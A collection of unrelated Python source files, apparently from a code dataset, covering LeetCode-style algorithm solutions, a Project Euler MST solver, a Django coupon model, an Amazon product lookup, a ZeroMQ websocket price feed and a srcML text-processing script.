        for i in range(len(nums)):
            # Use each anchor value only once to avoid duplicate triplets.
            if i == 0 or nums[i-1] != nums[i]:
                left = i + 1
                right = len(nums) - 1
                while left < right:
                    s = nums[i] + nums[left] + nums[right]
                    if s == 0:
                        res.append([nums[i], nums[left], nums[right]])
                        left += 1
                        right -= 1
                        # Skip over equal neighbours so each pair is unique.
                        while left < right and nums[left - 1] == nums[left]:
                            left += 1
                        while left < right and nums[right + 1] == nums[right]:
                            right -= 1
                    elif s < 0:
                        left += 1
                    else:
                        right -= 1
        return res
sol = Solution()
#print sol.threeSum([-1, 0, 1, 2, -1, -4])
print sol.threeSum([0,0,0])
|
995,079 | 41e655ec84a876a76c39d9825c0230f5e86cb8ff | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def rightSideView(self, root: 'TreeNode') -> 'List[int]':
        """Return the node values visible from the right side of a binary tree.

        Level-order traversal (BFS) that records the last node dequeued on
        each level, i.e. the rightmost one.
        """
        # Imported locally: this module never imports `collections`, so the
        # original `collections.deque` reference raised NameError at runtime.
        from collections import deque

        if not root:
            return []
        queue = deque([root])
        res = []
        while queue:
            # Iterate exactly over the current level; i == 0 marks the last
            # (rightmost) node dequeued on this level.
            for i in range(len(queue) - 1, -1, -1):
                node = queue.popleft()
                if i == 0:
                    res.append(node.val)
                if node.left is not None:
                    queue.append(node.left)
                if node.right is not None:
                    queue.append(node.right)
        return res
'''
类似层次遍历:唯一不同的是只需要输出这一层的最后一个
我们需要把这个和循环的i建立联系,这里不能用len(queue)
来建立联系,因为queue长度会变,所有用了减小的循环。
''' |
995,080 | 3fb95acea5607990dc7bd1a54d6fe965c3326c0d | """A program to compute a solution to Problem 107 on Project Euler."""
import timeit
def generate_matrix(filename):
    """Generate a matrix from an input text file.

    :param str filename: The name of the network file in .txt format
    :rtype list matrix: 2D list of edge weights; '-' entries become 0
    """
    matrix = []
    # Context manager closes the file even on error; the original opened the
    # handle and never closed it.
    with open(filename, 'r') as network_file:
        for line in network_file:
            edges = [0 if weight == '-' else int(weight)
                     for weight in line.strip().split(',')]
            matrix.append(edges)
    return matrix
def total_weight(network):
    """Calculate the total weight of edges in a network.

    :param list network: A network represented as a 2D list of edge weights
    :rtype int weight: the total weight of the network
    """
    # None entries are skipped, matching the documented tolerance for
    # missing edges; each undirected edge appears twice, hence the halving.
    weight = sum(edge for row in network for edge in row if edge is not None)
    return weight // 2
def generate_network_graph(network):
    """Generate a network graph from input network.

    :param list network: A network represented as a 2D list of weights
    :rtype dict network_graph: A 2D dictionary of {node: {neighbor: weight, ...}, ...}
    """
    num_nodes = len(network)
    network_graph = {}
    for y_node in range(num_nodes):
        neighbors = {}
        for x_node in range(num_nodes):
            # The original `is not 0` tested identity, which only worked via
            # CPython's small-int caching and warns on Python 3.8+; value
            # comparison is the correct test.
            if network[y_node][x_node] != 0:
                neighbors[x_node] = network[y_node][x_node]
        network_graph[y_node] = neighbors
    return network_graph
def prim(network_graph):
    """Implementation of Prim's Minimum Spanning Tree Algorithm.

    :param dict network_graph: A 2D dictionary of
                               {node: {neighbor: weight, ...}, ...}
    :rtype dict mst: A minimum spanning tree represented as {edge: weight}
    """
    seen_nodes = set()
    mst = set()
    edges = set()
    # Using the first node in the network graph as the root of the tree
    current_node = list(network_graph.keys())[0]
    while True:
        # Adding all edges from the root to the list of edges
        for current_neighbor in network_graph[current_node]:
            # Edge represented as (weight, [node, neighbor])
            edge = (network_graph[current_node][current_neighbor],
                    frozenset([current_node, current_neighbor]))
            if edge in mst:
                continue
            # Toggle: encountering an edge a second time removes it (both of
            # its endpoints are already reachable, so it would form a cycle).
            edges.remove(edge) if edge in edges else edges.add(edge)
        if edges:
            # Get the smallest edge in the list, remove & add to MST
            smallest_edge = min(edges)
            edges.remove(smallest_edge)
            mst.add(smallest_edge)
            # Get the next node to examine
            # NOTE(review): unpacking a frozenset yields its two members in
            # arbitrary order; correctness relies on the membership test
            # below, not on position -- confirm on equal-weight graphs.
            _, (new_node, new_neighbor) = smallest_edge
            seen_nodes.add(current_node)
            current_node = (new_node if new_neighbor in
                            seen_nodes else new_neighbor)
        else:
            break
    # Convert from sets to dictionary of {edge: weight}
    # 'final_weight' indicates the smallest weight for the given 'final_edge'
    # between two nodes that doesn't create a cycle
    return dict((final_edge, final_weight) for (final_weight, final_edge) in
                mst)
def main():
    """Solve Problem #107 from Project Euler."""
    # Generate the network from the given file, and get its original weight
    matrix = generate_matrix('network.txt')
    old_weight = total_weight(matrix)
    # Generate a network graph from the input network to be used in Prim's
    # algorithm
    graph = generate_network_graph(matrix)
    # Generate a minimum spanning tree from the network graph using Prim's
    # algorithm
    mst = prim(graph)
    # Saving = original total weight minus the weight kept by the MST.
    print(f"Old network weight: {old_weight}")
    print(f"New network weight: {old_weight - sum(mst.values())}")
# Main method to solve the problem & indicate execution time in seconds
if __name__ == '__main__':
start = timeit.default_timer()
main()
stop = timeit.default_timer()
print(f"Execution time: {stop - start} seconds")
|
995,081 | ae4e8201243934004a6ec75e367a99740f75f538 | from tetrimino import *
rows, colns = 20, 10
board = create_board(rows, colns)
tet = O
tet["pos"] = (18, 0)
place(tet, board)
tet["pos"] = (8, 0)
place(tet, board)
tet["pos"] = (0, 8)
place(tet, board)
print(board)
move_left(tet, board)
place(tet, board)
print(board)
tet["pos"] = (0, 0)
place(tet, board)
print(board)
move_right(tet, board)
print(board)
move_down(tet, board)
place(tet, board)
tet["pos"] = (18, 8)
move_down(tet, board)
place(tet, board)
print(board)
move_right(tet, board)
print(board)
tet = L
# L["pos"] = (0, 5)
# place(L, board)
# print(board)
# rotate_clockwise(L, board)
# print(board)
# rotate_anticlockwise(L, board)
# print(board)
|
995,082 | 7c866a302c2eaea43490efe7ccdc44cd9c83b1f1 | #!/usr/bin/env python
"""
amazon_api_lookup.py
This module uses the Amazon Product API to lookup barcodes as UPC and
EAN codes, and returns a list of possible product matches in the Amazon
catalog, along with the corresponding Amazon Standard Identification
Number (ASIN).
The actual Amazon Product API credentials necessary for access are
stored in a private, local file (amazon_local_settings.py) via a settings
harness.
"""
import sys
import json
from amazonproduct import API, errors
from amazon_settings import ACCESS_KEY, SECRET_KEY, ASSOCIATE, AMZLOCALE
api = API(locale=AMZLOCALE, access_key_id=ACCESS_KEY, secret_access_key=SECRET_KEY, associate_tag=ASSOCIATE)
def _is_duplicate (asin, current_list):
    """Check the current list of match objects and
    return a boolean if the asin already exists or not"""
    dup = False
    for m in current_list:
        try:
            # Python 2 `unicode`; compares against the 'sku' values that
            # lookup() stores for each match.
            if unicode(asin) == m['sku']:
                dup = True
                break
        except KeyError:
            # Entries without a 'sku' key are simply skipped.
            pass
    return dup
def lookup (barcode, ID_TYPES=['ISBN', 'UPC','EAN']):
    """Lookup the given barcode and return a list of possible matches"""
    # NOTE(review): the mutable default list is safe here only because
    # ID_TYPES is never mutated -- keep it read-only.
    matches = [] # list of {'desc', 'sku', 'type', 'vnd'}
    for idtype in ID_TYPES:
        try:
            result = api.item_lookup(barcode, SearchIndex='All', IdType=idtype)
            for item in result.Items.Item:
                # Skip ASINs already collected under another id type.
                if not _is_duplicate(item.ASIN, matches):
                    matches.append({'desc': unicode(item.ItemAttributes.Title),
                                    'sku': unicode(item.ASIN),
                                    'type': idtype,
                                    'vnd': 'AMZN:'+AMZLOCALE}) # vendor id
        except (errors.InvalidAccount, errors.InvalidClientTokenId, errors.MissingClientTokenId):
            print >>sys.stderr, "Amazon Product API lookup: bad account credentials"
        except errors.TooManyRequests, toomanyerr:
            print >>sys.stderr, "Amazon Product API lookup error:", toomanyerr
        except errors.InternalError, awserr:
            print >>sys.stderr, "Amazon Product API lookup error:", awserr
        except errors.InvalidParameterValue:
            # this simply means the barcode
            # does not exist for the given type,
            # so no need to do anything explicit
            pass
    return matches
if __name__ == "__main__":
"""Create a command-line main() entry point"""
if len(sys.argv) != 2:
# Define the usage
print >>sys.stderr, sys.argv[0], '[barcode]'
else:
# lookup the barcode and return
# a string of the results to stdout,
# or nothing if there were no matches
products = lookup(sys.argv[1])
sys.stdout.write(json.dumps(products))
|
995,083 | cdeb8aafbcaad2975e4fcd42c398b8f2be374595 | # -*- coding: utf-8 -*-
# ==============================================================================
# Imports
# ==============================================================================
from pytest_rpc.fixtures import * # noqa
# ==============================================================================
# Globals
# ==============================================================================
__version__ = '1.1.1'
|
995,084 | 47cb10f212f95e7cfba9132cbf25cc6aeaea58c3 | # -*- coding:utf8 -*-
from django.db import models
from django.utils.timezone import now
from horizon.models import (model_to_dict,
BaseManager,
get_perfect_filter_params)
from Admin_App.ad_coupons.models import (CouponsConfig,
CouponsUsedRecord,
CouponsSendRecord)
from users.models import ConsumerUser
from horizon.main import minutes_15_plus, make_perfect_time_delta
from horizon import main
import datetime
import re
import os
import copy
class BaseCouponsManager(models.Manager):
    """Manager that defaults queries to active coupons (status=1) and marks
    instances past their expiry as expired (status=400).

    NOTE(review): the 400 status is set on the in-memory instance(s) only;
    it is not persisted back to the database here.
    """
    def get(self, *args, **kwargs):
        # Only active coupons unless the caller asks for a status explicitly.
        if 'status' not in kwargs:
            kwargs['status'] = 1
        instance = super(BaseCouponsManager, self).get(*args, **kwargs)
        if now() >= instance.expires:
            instance.status = 400
        return instance
    def filter(self, *args, **kwargs):
        # Same defaulting and expiry marking as get(), applied per instance.
        if 'status' not in kwargs:
            kwargs['status'] = 1
        instances = super(BaseCouponsManager, self).filter(*args, **kwargs)
        for instance in instances:
            if now() >= instance.expires:
                instance.status = 400
        return instances
class Coupons(models.Model):
"""
我的优惠券
"""
coupons_id = models.IntegerField(u'优惠券ID', db_index=True)
user_id = models.IntegerField(u'用户ID')
# 优惠券状态:1:未使用 2:已使用 400:已过期
status = models.IntegerField(u'优惠券状态', default=1)
expires = models.DateTimeField(u'优惠券过期时间', default=now)
created = models.DateTimeField(u'创建时间', default=now)
updated = models.DateTimeField(u'更新时间', auto_now=True)
objects = BaseCouponsManager()
class Meta:
db_table = 'ys_coupons'
ordering = ['-coupons_id']
def __unicode__(self):
return str(self.coupons_id)
@property
def is_expired(self):
if self.status == 400:
return True
return False
@classmethod
def get_object(cls, **kwargs):
kwargs = get_perfect_filter_params(cls, **kwargs)
try:
return cls.objects.get(**kwargs)
except Exception as e:
return e
@classmethod
def get_perfect_detail(cls, **kwargs):
instance = cls.get_object(**kwargs)
if isinstance(instance, Exception):
return instance
detail = model_to_dict(instance)
admin_instance = CouponsConfig.get_object(pk=instance.coupons_id)
if isinstance(admin_instance, Exception):
return admin_instance
admin_detail = model_to_dict(admin_instance)
pop_keys = ('id', 'created', 'updated', 'expire_in', 'total_count',
'send_count', 'status')
for key in pop_keys:
admin_detail.pop(key)
detail.update(**admin_detail)
return detail
@classmethod
def get_detail_for_make_orders(cls, **kwargs):
kwargs['expires__gt'] = now()
return cls.get_perfect_detail(**kwargs)
@classmethod
def filter_objects(cls, **kwargs):
kwargs = get_perfect_filter_params(cls, **kwargs)
try:
return cls.objects.filter(**kwargs)
except Exception as e:
return e
@classmethod
def get_perfect_detail_list(cls, **kwargs):
_kwargs = copy.deepcopy(kwargs)
if kwargs.get('status') == 400:
kwargs['status'] = 1
kwargs['expires__lte'] = now()
_kwargs.pop('status')
else:
kwargs['expires__gt'] = now()
instances = cls.filter_objects(**kwargs)
details = []
for instance in instances:
consumer_detail = model_to_dict(instance)
admin_instance = CouponsConfig.get_object(pk=instance.coupons_id, **_kwargs)
if isinstance(admin_instance, Exception):
continue
admin_detail = model_to_dict(admin_instance)
pop_keys = ('id', 'created', 'updated', 'expire_in', 'total_count',
'send_count', 'status')
for key in pop_keys:
admin_detail.pop(key)
consumer_detail.update(**admin_detail)
details.append(consumer_detail)
return details
@classmethod
def update_status_for_used(cls, pk):
"""
更新优惠券状态是为使用状态
"""
instance = cls.get_object(pk=pk)
if isinstance(instance, Exception):
return instance
try:
instance.status = 2
instance.save()
except Exception as e:
return e
user = ConsumerUser.get_object(pk=instance.user_id)
used_record_data = {'user_id': instance.user_id,
'coupons_id': instance.coupons_id,
'phone': user.phone}
try:
CouponsUsedRecord(**used_record_data).save()
except:
pass
return instance
@classmethod
def is_used(cls, pk):
instance = cls.get_object(pk=pk)
if isinstance(instance, Exception):
return True
if instance.status == 2:
return True
else:
return False
class CouponsAction(object):
"""
我的优惠券操作
"""
def create_coupons(self, user_ids, coupons):
"""
发放优惠券到用户手中
返回:成功:发放数量,
失败:Exception
"""
if isinstance(user_ids, (str, unicode)):
if user_ids.lower() != 'all':
return Exception('The params data is incorrect.')
user_ids = ConsumerUser.filter_objects()
else:
if not isinstance(user_ids, (list, tuple)):
return Exception('The params data is incorrect.')
if coupons.total_count:
if (coupons.total_count - coupons.send_count) < len(user_ids):
return Exception('The coupon total count is not enough.')
send_count = 0
for item in user_ids:
if hasattr(item, 'pk'):
user_id = item.pk
phone = item.phone
else:
user_id = item
user = ConsumerUser.get_object(pk=user_id)
phone = user.phone
initial_data = {'coupons_id': coupons.pk,
'user_id': user_id,
'expires': make_perfect_time_delta(days=coupons.expire_in,
hours=23,
minutes=59,
seconds=59)}
instances = []
if coupons.each_count:
for i in range(coupons.each_count):
instance = Coupons(**initial_data)
instances.append(instance)
else:
instances = [Coupons(**initial_data)]
for ins in instances:
try:
ins.save()
except Exception as e:
return e
send_count += len(instances)
send_record_data = {'coupons_id': coupons.pk,
'user_id': user_id,
'phone': phone,
'count': len(instances)}
try:
CouponsSendRecord(**send_record_data).save()
except Exception as e:
pass
return send_count
|
995,085 | 0bcfeaf2ff236e243167e506e32a5ed7804c74f0 | '''
You are given two non-empty linked lists representing two non-negative integers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list.
You may assume the two numbers do not contain any leading zero, except the number 0 itself.
Example:
Input: (2 -> 4 -> 3) + (5 -> 6 -> 4)
Output: 7 -> 0 -> 8
Explanation: 342 + 465 = 807.
'''
import pytest
# Definition for singly-linked list.
class ListNode:
    """A singly-linked list node holding one digit.

    ``next`` defaults to None so tail nodes (and the nodes that
    addTwoNumbers appends one at a time with a single argument) can be
    constructed without an explicit successor.  Two-argument calls used
    by the tests keep working unchanged.
    """
    def __init__(self, x, next=None):
        self.val = x      # the digit stored in this node
        self.next = next  # following node, or None at the tail
@pytest.mark.parametrize('input_and_output', [
    ([
        ListNode(2, ListNode(4, ListNode(3, None))),
        ListNode(5, ListNode(6, ListNode(4, None)))],
        [7, 0, 8]),
    ([
        ListNode(5, None),
        ListNode(5, None)],
        [0, 1]),
    ([
        ListNode(0, None),
        ListNode(7, ListNode(3, None))],
        [7, 3])
    ])
def test_add_two_numbers(input_and_output):
    """Check addTwoNumbers against (list1, list2) -> expected digits.

    Expected digits are given most-significant-last; they are reversed
    so pop() yields them in traversal order.
    """
    input_first_node = input_and_output[0][0]
    input_second_node = input_and_output[0][1]
    expected_output = input_and_output[1][::-1]
    predicted_output = addTwoNumbers(input_first_node, input_second_node)
    last_node = predicted_output
    assert isinstance(last_node, ListNode)
    # walk the result list, consuming one expected digit per node
    while(last_node):
        print(last_node.val)
        expected_val = expected_output.pop()
        assert last_node.val == expected_val
        last_node = last_node.next
    # every expected digit must have been matched by a node
    assert len(expected_output) == 0
def addTwoNumbers(l1: ListNode, l2: ListNode) -> ListNode:
    """Add two non-negative numbers stored as reversed-digit lists.

    Digits are summed in place into l1's nodes; when l2 (or a final
    carry) outlives l1, new nodes are appended.  Returns the head of
    the result, which is l1's original head.  Assumes both inputs are
    non-empty, per the problem statement.
    """
    summation = residue = previous_last_node = 0
    first_node = l1
    while(l1 or l2):
        summation = 0
        if l1:
            summation += l1.val
        if l2:
            summation += l2.val
        summation += residue  # carry from the previous digit
        if l1:
            l1.val = summation % 10
            previous_last_node = l1
            l1 = l1.next
        else:
            # BUGFIX: ListNode's __init__ takes (x, next) with no
            # default, so the original one-argument call raised
            # TypeError; pass None explicitly for the tail.
            previous_last_node.next = ListNode(summation % 10, None)
            previous_last_node = previous_last_node.next
        residue = summation // 10  # integer carry (0 or 1)
        if l2:
            l2 = l2.next
    if residue:
        # final carry, e.g. 5 + 5 -> digits [0, 1]
        previous_last_node.next = ListNode(residue, None)
    return first_node
|
995,086 | 4ecb88c9eedefde13357d568aedb8ab3690c6ca7 | import gevent
from gevent.pywsgi import WSGIServer
import zmq.green as zmq
from geventwebsocket.handler import WebSocketHandler
from itertools import cycle
import json
from pricing_app import app
from pricing_app.model.index import EquityIndex
WAIT = 60
def zmq_qry_pub(context):
    """PUB -- queries and PUBLISHES the data

    For each hard-coded timestamp, fetches the last prices of the CAC
    components and publishes one JSON message per ticker, sleeping WAIT
    seconds between timestamps.  (Python 2: dict.iteritems.)
    """
    app.logger.info("zmq_qry_pub started")
    socket = context.socket(zmq.PUB)
    socket.connect('tcp://127.0.0.1:7000')
    timestamps = ['0810', '0811', '0812']
    idx = EquityIndex('CAC')
    # for ts in cycle(timestamps):
    for ts in timestamps:
        price_data = idx.components_last_px(ts)
        for topic, msg_data in price_data.iteritems():
            if msg_data:
                # push the code/ticker into the dict
                msg_data['ticker'] = topic
                # reformat with a colon
                msg_data['ts'] = ts[:2] + ':' + ts[2:]
                # and jsonify....
                msg = json.dumps(msg_data)
                socket.send(msg)
        gevent.sleep(WAIT)
    app.logger.info("zmq_qry_pub closed")
def zmq_sub(context):
    """SUBscribe to PUBlished message then PUBlish to inproc://queue

    Bridges every message arriving on tcp://*:7000 onto the in-process
    queue consumed by WebSocketApp.  Runs forever (never returns).
    """
    app.logger.info("zmq_sub started")
    sock_incoming = context.socket(zmq.SUB)
    sock_outgoing = context.socket(zmq.PUB)
    sock_incoming.bind('tcp://*:7000')
    sock_outgoing.bind('inproc://queue')
    # empty prefix subscribes to every topic
    sock_incoming.setsockopt(zmq.SUBSCRIBE, "")
    while True:
        msg = sock_incoming.recv()
        sock_outgoing.send(msg)
class WebSocketApp(object):
    """Funnel messages coming from an inproc zmq socket to the websocket"""
    def __init__(self, context):
        # the shared zmq context is required for the inproc transport
        app.logger.info("WebSocketApp initialised")
        self.context = context
    def __call__(self, environ, start_response):
        """WSGI entry point: subscribe to inproc://queue and forward
        every message to the connected websocket client, forever."""
        app.logger.info("WebSocketApp __call__")
        ws = environ['wsgi.websocket']
        sock = self.context.socket(zmq.SUB)
        sock.setsockopt(zmq.SUBSCRIBE, "")
        sock.connect('inproc://queue')
        while True:
            msg = sock.recv()
            ws.send(msg)
def main():
    """Wire the pipeline: spawn the price publisher, start the
    websocket and HTTP servers, then block in the zmq bridge."""
    app.logger.info("setting context")
    context = zmq.Context()
    gevent.spawn(zmq_qry_pub, context)
    # websocket server: copies inproc zmq messages to websocket
    ws_server = WSGIServer(
        ('', 9999),
        WebSocketApp(context),
        handler_class=WebSocketHandler
    )
    http_server = WSGIServer(('', 8080), app)
    http_server.start()
    ws_server.start()
    zmq_sub(context)  # never returns; pumps messages into inproc://queue
if __name__ == '__main__':
    main()
|
995,087 | 6f7d9a72fa98814ada768a258967c370eae5cf97 | import pickle
from train_nn import forward_nn
def create_features(x):
    """Build a unigram count vector for sentence *x*.

    Uses the module-level ``ids`` mapping ('UNI:<word>' -> index) loaded
    in __main__; words absent from the mapping are ignored.
    """
    phi = [0] * len(ids)
    for token in x.strip().split():
        key = 'UNI:' + token
        if key in ids:
            phi[ids[key]] += 1
    return phi
if __name__ == '__main__':
    # Classify each test title with the pickled network and write
    # "<label>\t<title>" lines to the answer file.
    test_f = '../../data/titles-en-test.word'
    answer = 'my_answer.nn'
    # load the trained network and the feature-id mapping
    with open('network5_s_l.dump', 'rb') as net_f:
        net = pickle.load(net_f)
    with open('ids5_s_l.dump', 'rb') as ids_f:
        ids = pickle.load(ids_f)
    with open(answer, 'w') as ans_f, open(test_f, 'r') as t_f:
        for x in t_f:
            x = x.strip()
            x_l = x.lower()
            phi_0 = create_features(x_l)
            phiS = forward_nn(net, phi_0)
            # sign of the final layer's single output decides the label
            y_ = (1 if phiS[len(net)][0] >= 0 else -1)
            ans_f.write ('{}\t{}\n'.format(y_, x))
995,088 | c42a7228ea7859a51e3f20826a26f0f04fe003b5 | import requests
from .constants import DEFAULT_API_PATH, OLD_API_PATH
# Utility methods
def raise_for_status(response):
    """
    Custom raise_for_status with more appropriate error message.

    Raises requests.exceptions.HTTPError for 4xx/5xx responses,
    appending the API's JSON "message" field when it adds information
    beyond the HTTP reason phrase.  Returns None for other statuses.
    """
    status = response.status_code
    if 400 <= status < 500:
        error_msg = "{} Client Error: {}".format(status, response.reason)
    elif 500 <= status < 600:
        error_msg = "{} Server Error: {}".format(status, response.reason)
    else:
        return
    try:
        detail = response.json().get("message")
    except ValueError:
        detail = None
    if detail and detail.lower() != response.reason.lower():
        error_msg += ".\n\t{}".format(detail)
    raise requests.exceptions.HTTPError(error_msg, response=response)
def clear_empty_values(args):
    """
    Scrap junk data from a dict.

    Returns a new dict keeping every key whose value is not None;
    falsy-but-meaningful values such as 0 and "" are preserved.
    """
    return {key: value for key, value in args.items() if value is not None}
def format_old_api_request(dataid=None, content_type=None):
    """Build a legacy-API request path.

    Accepts a dataset id, a content type, or both; raises when neither
    is supplied.
    """
    if dataid is None and content_type is None:
        raise Exception(
            "This method requires at least a dataset_id or content_type."
        )
    if dataid is None:
        return "{}.{}".format(OLD_API_PATH, content_type)
    if content_type is None:
        return "{}/{}".format(OLD_API_PATH, dataid)
    return "{}/{}.{}".format(OLD_API_PATH, dataid, content_type)
def format_new_api_request(dataid=None, row_id=None, content_type=None):
    """Build a new-style API request path.

    Both dataid and content_type are required; row_id optionally scopes
    the request to a single row.  Raises otherwise.
    """
    if dataid is not None and content_type is not None:
        if row_id is None:
            return "{}{}.{}".format(DEFAULT_API_PATH, dataid, content_type)
        return "{}{}/{}.{}".format(
            DEFAULT_API_PATH, dataid, row_id, content_type
        )
    raise Exception("This method requires at least a dataset_id or content_type.")
def authentication_validation(username, password, access_token):
    """
    Only accept one form of authentication.

    Basic auth requires both username and password; an OAuth token may
    not be combined with either.  Raises on inconsistent combinations,
    returns None otherwise.
    """
    if bool(username) is not bool(password):
        raise Exception("Basic authentication requires a username AND" " password.")
    if access_token and (username or password):
        raise Exception(
            "Cannot use both Basic Authentication and"
            " OAuth2.0. Please use only one authentication"
            " method."
        )
def download_file(url, local_filename):
    """
    Utility function that downloads a chunked response from the specified url to a local path.
    This method is suitable for larger downloads.
    """
    # stream=True keeps the body out of memory; it is consumed chunkwise
    response = requests.get(url, stream=True)
    with open(local_filename, "wb") as outfile:
        for chunk in response.iter_content(chunk_size=1024):
            if chunk: # filter out keep-alive new chunks
                outfile.write(chunk)
|
995,089 | ebedef4fbc5ab8912a04677c2d202050a8a361b3 | # """
# This is the interface that allows for creating nested lists.
# You should not implement it, or speculate about its implementation
# """
#class NestedInteger:
# def __init__(self, value=None):
# """
# If value is not specified, initializes an empty list.
# Otherwise initializes a single integer equal to value.
# """
#
# def isInteger(self):
# """
# @return True if this NestedInteger holds a single integer, rather than a nested list.
# :rtype bool
# """
#
# def add(self, elem):
# """
# Set this NestedInteger to hold a nested list and adds a nested integer elem to it.
# :rtype void
# """
#
# def setInteger(self, value):
# """
# Set this NestedInteger to hold a single integer equal to value.
# :rtype void
# """
#
# def getInteger(self):
# """
# @return the single integer that this NestedInteger holds, if it holds a single integer
# Return None if this NestedInteger holds a nested list
# :rtype int
# """
#
# def getList(self):
# """
# @return the nested list that this NestedInteger holds, if it holds a nested list
# Return None if this NestedInteger holds a single integer
# :rtype List[NestedInteger]
# """
"""
// Time Complexity : O(n)
// Space Complexity : O(n)
// Did this code successfully run on Leetcode : Yes
// Any problem you faced while coding this : No
// Your code here along with comments explaining your approach
Algorithm Explanation
Given below
"""
class Solution:
    """LeetCode 339 (Nested List Weight Sum).

    ``List`` and ``NestedInteger`` are supplied by the LeetCode harness;
    this file does not import them itself.
    """
    def depthSum(self, nestedList: List[NestedInteger]) -> int:
        """
        Since we deal with the depth, we can go with the DFS approach where we iterate over the list and for each nested list type,we recurse with the depth + 1, else we add the sum to the result
        """
        final_sum = 0
        def dfs(nlist,depth):
            # accumulate into the enclosing scope's running total
            nonlocal final_sum
            #no base case
            #logic
            for ele in nlist:
                if ele.isInteger():
                    #add the value to the sum, weighted by nesting depth
                    final_sum += ele.getInteger() * depth
                else:
                    dfs(ele.getList(),depth+1)
        dfs(nestedList,1)
        return final_sum
995,090 | 51bc2ac76f1d15205a786d42cf6d8048927eae80 | '''
Created on Mar 18, 2013
@author: joshua
'''
import xml.etree.ElementTree as ET
import re
import camelcase_sep
import stemming.porter2
import Stemmer
from gensim import corpora, models, similarities
import numpy as np
import scipy.spatial.distance
from sklearn import mixture
import math
from functools import wraps
from time import time
import pickle, os, copy, string, argparse, cProfile, logging, sys
import pypr.clustering.gmm as gmm
from guppy import hpy
def timed(f):
    """Decorator that prints how long the wrapped callable took (py2).

    Elapsed time is truncated to whole seconds by the %d format.
    """
    @wraps(f)
    def wrapper(*args, **kwds):
        start = time()
        result = f(*args, **kwds)
        elapsed = time() - start
        print "%s took %d seconds to finish" % (f.__name__, elapsed)
        return result
    return wrapper
def setup():
    """Parse command-line options and load the srcML document.

    Returns (args dict, system name, parsed ElementTree).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--sys', type=str, required=True)
    parser.add_argument('--srcml', type=str, required=True)
    parser.add_argument('--weights', type=str, choices=['uni', 'em'], default='uni')
    parser.add_argument('--lang', type=str, choices=['java', 'c'], default='java')
    args = vars(parser.parse_args())
    #EASYMOCK_NAME = 'easymock'
    #JUNIT_NAME = 'junit'
    #JHOTDRAW_NAME = 'jhotdraw'
    sysname = args['sys']
    #junitFilename = '/home/joshua/Documents/source/junit4.5/junit4.5.xml'
    #easymockFilename = '/home/joshua/Documents/source/easymock2.4/src/easymock2.4.xml'
    #jhotdrawFilename = '/home/joshua/Documents/source/JHotDraw 7.4.1/Source/jhotdraw7/src/main/jhotdraw7.4.1.xml'
    selectedFilename = args['srcml']
    tree = ET.parse(selectedFilename)
    #root = tree.getroot()
    return args, sysname, tree
def get_all_text(elem):
    """Recursively concatenate the text of *elem*'s descendants.

    <comment> elements are skipped (they are harvested separately) and
    element tail text is ignored.  Pieces are joined with a leading
    space each.
    """
    text = ''
    #if not elem.text == None:
    #    text = text + ' ' + elem.text
    if elem.tag == 'comment':
        # callers should never pass a comment element directly
        print 'get_all_text was passed a comment tag'
        return text
    for child in elem:
        if child.tag == 'comment':
            continue
        if child.text == None:
            pass
        else:
            text = text + ' ' + child.text
        text = text + get_all_text(child)
    return text
def recurse_for_tag(elem, tag):
    """Depth-first collect all elements under *elem* whose tag matches.

    Matching elements are not descended into; non-matching elements are
    searched recursively.  Returns matches in document order.
    """
    found = []
    for node in elem:
        found += [node] if node.tag == tag else recurse_for_tag(node, tag)
    return found
def print_all(elem):
    """Recursively print the text of every descendant element (py2).

    Debug helper; the trailing comma keeps output on one line.
    """
    for child in elem:
        if child.text == None:
            pass
        else:
            print child.text,
        print_all(child)
def get_function_info(currContainerName, function):
    """Extract name, parameter-list and body text from a srcML
    <function>/<constructor> element.

    Returns (allFuncNames, allParameterListText, allFunctionBlockText),
    each a space-prefixed concatenation of the corresponding pieces.
    currContainerName is kept for signature compatibility (it was only
    used by now-removed debug prints).
    """
    currFuncName = "ERROR:INVALID_FUNCTION_NAME"
    allFuncNames = ''
    for functionName in function.findall('name'):
        if not functionName.text == None:
            currFuncName = functionName.text
        else:
            # qualified name: the text lives on a nested <name> child
            currFuncName = functionName.find('name').text
        allFuncNames = allFuncNames + ' ' + currFuncName
    allParameterListText = ''
    # BUGFIX: parameterListText must exist before the loop; the original
    # raised UnboundLocalError when the first <parameter_list> had no
    # text and the error branch appended to the undefined variable.
    parameterListText = ''
    for parameterList in function.findall('parameter_list'):
        if not parameterList.text == None:
            parameterListText = get_all_text(parameterList)
            allParameterListText = allParameterListText + ' ' + parameterListText
        else:
            errorParamListStr = 'ERROR:BROKEN_PARAM_LIST'
            parameterListText = parameterListText + ' ' + errorParamListStr
    allFunctionBlockText = ''
    for block in function.findall('block'):
        allFunctionBlockText = allFunctionBlockText + ' ' + get_all_text(block)
    return allFuncNames, allParameterListText, allFunctionBlockText
def convert_to_alpha_only(inString):
    """Replace every run of non-alphabetic characters with one space."""
    return re.sub('[^a-zA-Z]+', ' ', inString)
'''
Takes the raw mapping of a zone's word lists and converts it to the
set-of-documents form expected by gensim.
'''
@timed
def createbow(args, unit_items):
    """Build cleaned bag-of-words documents from {filename: [strings]}.

    Pipeline per file: join -> strip non-alphabetic -> split camel case
    -> lowercase -> drop stop words -> drop language keywords -> stem.
    Returns (docs, filenames) with matching indices.
    """
    stopWordsFilename = "/home/joshua/Applications/mallet-2.0.7/stoplists/en.txt"
    stopWordsFile = open(stopWordsFilename, 'r')
    stoplist = set([line.strip() for line in stopWordsFile])
    stopWordsFile.close()
    javaPlWordsFilename = 'res/javakeywords'
    cPlWordsFilename = 'res/ckeywords'
    selectedPlWordsFilename = ''
    if args['lang'] == 'java':
        selectedPlWordsFilename = javaPlWordsFilename
    elif args['lang'] == 'c':
        selectedPlWordsFilename = cPlWordsFilename
    else:
        raise Exception('invalid language selected: ' + args['lang'])
    plWordsFile = open(selectedPlWordsFilename,'r')
    plWordList = set([line.strip() for line in plWordsFile])
    plWordsFile.close()
    print ''
    print 'stop words:'
    print stoplist
    print ''
    print 'Listing modified unit_items...'
    docs = []
    filenames = []
    stemmer = Stemmer.Stemmer('english')
    # NOTE(review): the loop variable 'list' shadows the builtin
    for i, (filename, list) in enumerate(unit_items.iteritems()):
        print i, filename
        itemsStr = ' '.join(list)
        logging.warning('\t' + 'Raw:')
        logging.debug('\t' + itemsStr)
        itemsStr = convert_to_alpha_only(itemsStr)
